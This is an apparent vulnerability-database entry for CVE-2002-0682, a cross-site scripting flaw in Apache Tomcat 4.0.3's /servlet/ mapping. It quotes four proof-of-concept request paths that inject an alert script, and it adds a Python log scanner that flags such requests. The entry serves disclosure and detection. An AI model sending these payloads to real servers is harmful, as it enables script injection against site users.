Apache Tomcat Servlet Mapping Cross-Site Scripting Vulnerability

Vulnerability ID: 1106847
Vulnerability type: Cross-site scripting
Published: 2002-07-10
Updated: 2006-04-07
CVE ID: CVE-2002-0682
CNNVD-ID: CNNVD-200207-072
Platform: Linux
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/21604
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200207-072
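|Vulnerability details
Apache Tomcat 4.0.3 contains a cross-site scripting vulnerability. A remote attacker can execute script as other web users via script in a URL with the /servlet/ mapping; the script is not filtered when the servlet throws an exception.
|Exploit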
source: http://www.securityfocus.com/bid/5193/info

A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack.

When servlet mapping is enabled, it is possible to invoke various servlets and classes and cause Apache Tomcat to throw an exception. This will make cross site scripting attacks possible. 

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>
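
A defender can look for this request shape in access logs. The following is an added example, not part of the original advisory or of Tomcat: it flags requests under /servlet/ whose path carries HTML markup after percent-decoding. The Common Log Format request field, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Angle brackets never belong in a servlet class name or its path info.
MARKUP_RE = re.compile(r"[<>]")
PREFIX = "/servlet/"


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so markup under an extra encoding layer is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(request_path):
    """True when a /servlet/ path carries HTML markup after the prefix."""
    path = fully_decode(request_path.split("?", 1)[0])
    if not path.lower().startswith(PREFIX):
        return False
    return bool(MARKUP_RE.search(path[len(PREFIX):]))


def scan(log_lines):
    """Return the raw request paths in log_lines that match the pattern."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and is_suspicious(match.group(1)):
            hits.append(match.group(1))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2002:12:00:01 +0000] "GET /servlet/org.apache.catalina.Globals/%3CSCRIPT%3Ealert(document.domain)%3C/SCRIPT%3E HTTP/1.0" 404 812',
    '192.0.2.11 - - [10/Jul/2002:12:00:05 +0000] "GET /servlet/org.apache.catalina.Context/%253Cb%253E HTTP/1.1" 404 790',
    '192.0.2.12 - - [10/Jul/2002:12:00:09 +0000] "GET /servlet/HelloWorldExample HTTP/1.1" 200 1024',
    '192.0.2.13 - - [10/Jul/2002:12:00:12 +0000] "GET /index.jsp?q=%3Cb%3E HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious servlet request:", hit)
```
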
|References

Source: VULNWATCH
Name: 20020710 [VulnWatch] wp-02-0008: Apache Tomcat Cross Site Scripting
Link: http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0014.html
Source: XF
Name: tomcat-servlet-xss(9520)
Link: http://xforce.iss.net/xforce/xfdb/9520
Source: BID
Name: 5193
Link: http://www.securityfocus.com/bid/5193
Source: OSVDB
Name: 4973
Link: http://www.osvdb.org/4973
Source: BUGTRAQ
Name: 20020710 wp-02-0008: Apache Tomcat Cross Site Scripting
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=102631703811297&w=2